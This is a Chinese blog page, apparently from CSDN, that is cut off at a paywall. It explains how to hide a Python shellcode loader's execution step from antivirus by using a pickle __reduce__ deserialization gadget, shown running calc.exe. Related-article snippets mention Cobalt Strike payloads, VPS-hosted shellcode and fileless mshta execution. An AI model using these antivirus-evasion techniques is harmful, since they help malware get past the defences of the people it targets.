python类加载器_利用Python反序列化运行加载器实现免杀

最新推荐文章于 2024-04-15 10:53:19 发布
最新推荐文章于 2024-04-15 10:53:19 发布
阅读量533 收藏 2
点赞数
文章标签: python类加载器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36266554/article/details/113674173
版权

前言

前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。

f4ebe77324c2db8d3d96fa715ae028b5.png

所以我们要想办法去掉加载器中明显的特征。

原理及实现

在绕过静态查杀方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess.Popen这种,一眼就能看出来。所以也要想办法隐藏执行这一步的特征,这里就可以利用反序列化。

下面我们来看一段Python反序列化的代码:

import subprocessimport cPickleclass gugu(object):def __reduce__(self):return (subprocess.Popen, (('calc.exe',),))ret = cPickle.dumps(gugu())print repr(ret)cPickle.loads(ret)

8806caf9f0795ee6cf39927211336ea7.png

程序在执行完毕后输出了序列化后的值,并弹了个计算器,代码中__reduce__的定义如下:

__reduce__(self)

当定义扩展类型时(也就是使用Python的C语言API实现的类型),如果你想pickle它们,你必须告诉Python如何pickle它们。__reduce__被定义之后,当对象被Pickle时就会被调用。它要么返回一个代表全局名称的字符串,Pyhton会查找它并pickle,要么返回一个元组。这个元组包含2到5个元素,其中包括:一个可调用的对象,用于重建对象时调用;一个参数元素,供那个可调用对象使用;被传递给 setstate 的状态(可选);一个产生被pickle的列表元素的迭代器(可选);一个产生被pickle的字典元素的迭代器(可选);

所以核心就是__reduce__这个魔法函数的返回

最低0.47元/天 解锁文章
莹石
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python免杀技术详解
weixin_68789096的博客
11-02 1303
在网络安全领域,Shellcode加载通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
Python反序列化免杀上线CS
qq_57686163的博客
08-20 788
简单免杀上线cs
木马免杀代码之python反序列化分离免杀
最新发布
04-15 893
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2264
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
Pytorch学习笔记06----数据加载
qq_39400324的博客
04-05 1271
  数据是深度学习的基础,我们解决的大多数深度学习问题都是需要数据的。而每一种深度学习框架都对数据的格式有自己的要求,因此,本文主要讲解了 PyTorch 对输入数据的格式要求,以及如何将现实中的数据处理成 PyTorch 能够识别的数据集合。 数据加载一 、数据的分批二、MNIST 的分批->原始数据集加载三、葡萄酒数据的分批->自定义数据集加载 一 、数据的分批   由于深度学习中的数据量一般都是极大的,我们无法一次性将所有数据全部加载到内存中。因此,在模型训练之前,一般我们都会对训练集进行分批,将数
内存的堆分配和栈分配 & 字符数组,字符指针,Sizeof总结
freesnail的专栏
09-28 569
堆和栈的区别一个由C/C++编译的程序占用的内存分为以下几个部分1、栈区(stack)— 由编译自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中的栈。2、堆区(heap) — 一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式倒是类似于链表,呵呵。3、全局区(静态区)(static)—,全局变量和静态变量的存储
利用Python反序列化运行加载实现免杀1
08-03
前言前几天在看Python的shellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载
121-利用加载以及Python反序列化绕过AV.pdf
09-20
为了绕过杀软的检测,攻击者可以使用加载将Shellcode加载到内存中,并使用Python反序列化实现绕过AV的目的。 在这篇文章中,我们将介绍利用加载以及Python反序列化绕过AV的原理和方法。首先,我们需要了解...
python反序列化-分离免杀1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是“分离免杀”策略。 免杀技术的主要目标是让恶意代码避开安全软件的检测,从而在目标系统上成功执行。常见的免杀方法包括修改特征码、使用花...
Python中的迭代漫谈
09-22
Python编程中,迭代是一个非常重要的概念,它允许我们遍历任何可迭代对象的元素,而无需一次性将所有元素加载到内存中。这在处理大量数据或资源有限的情况下尤其有用。迭代实现了`__iter__()`和`__next__()`...
Python函数的迭代与生成的示例代码
09-16
Python编程中,迭代和生成是两种非常重要的概念,它们允许我们以高效的方式处理大量数据,尤其是当数据无法一次性加载到内存时。本文将详细探讨这两个概念,以及如何通过实例代码来理解和使用它们。 首先,让...
类的加载的各种方式总结
wangdonghello的专栏
07-22 686
水平有限,欢迎更正 类加载的原理:就是通过一个类包的全限定名来加载某个类。 至于类的加载原理及加载顺序,可以上网查找,在这里就不累述了。 类加载加载类的方式 1.直接new 一个ClassLoader ,实现内部匿名类 要实现加载类,可以重写loadClass方法,然后调用ClassLoader的defineClass方法;比如: ClassLoader myClas...
python 例子: 实现动态加载类,并自动执行它定义的函数
大树叶 技术专栏
01-08 5144
========= MiniJenkinsWorker2.py 内容如下 =========== ''' @author: hongbin ''' import xmlrunner import importlib import os import types def main():     '''      Function: give one module
jvm之java类加载机制和类加载器(ClassLoader)的详解
热门推荐
翻过一座座山
08-13 22万+
当程序主动使用某个类时,如果该类还未被加载到内存中,则JVM会通过加载、连接、初始化3个步骤来对该类进行初始化。如果没有意外,JVM将会连续完成3个步骤,所以有时也把这个3个步骤统称为类加载或类初始化。 一、类加载过程 1.加载 加载指的是将类的class文件...
加载过程和类加载器
不忘初心的博客
03-05 6889
    在Java中,类加载都是在运行期间执行的,这种策略虽然令类加载稍微增加一些性能,但是会给java应用程序提供高度的灵活性。类加载的过程    和其他语言一样,java编译同样能够将.java文件编译成.class,但是对于JVM来讲,它并不关心,是哪种语言经过编译形成的。    JVM类加载工作原理:就是把类的class文件加载到内存中,并对数据进行校验、转换解析和初始化,最终形成被虚拟...
python序列化和反序列化_python反序列化免杀
weixin_39789042的博客
01-31 642
在日常的渗透行动当中,当我们对目标进行内网横向渗透时很不幸的是内网一般往往都会部署防火墙、流量监控等设备,杀软更是成为了服务的标配,所以如何进行免杀绕过杀毒软件的限制让主机上线成了我们首要解决的问题之一下面使用python反序列化进行免杀这是python原始shellcode加载方式importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8....
(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
daxi0ng的博客
01-31 1696
1、首先cs生成一个64位的Python Payload 2、截取其中的Payload,并进行base64编码。 3、把这一串子base64放到VPS上。并开启web服务。 python3 -m http.server 7777 4、使用以下脚本。将Python Payload进行反序列化。 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs,base64
python 反序列化_python反序列化的坑
weixin_29115107的博客
02-03 514
今天遇到python一个坑,调用memcached的get_man报错:memcache2 get :1:photo:latest:forward:5855687 cost 2857.6438427转发 unpickle :1:photo:latest:forward:5855687 FAIL __import__() argument 1 must be string without null...
shellcode免杀
weixin_43526443的博客
07-14 1799
0x06利用wmic远程文件不落地执行shellcode 1、msf生成的hta链接放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务 <?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" ..
基于pytorch用python语言写一个利用LSTM模型对时间序列分类的程序
05-27
好的,以下是基于PyTorch用Python语言写一个利用LSTM模型对时间序列分类的程序的示例代码: ```python import torch import torch.nn as nn # 定义LSTM模型类 class LSTMModel(nn.Module): def __init__(self, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值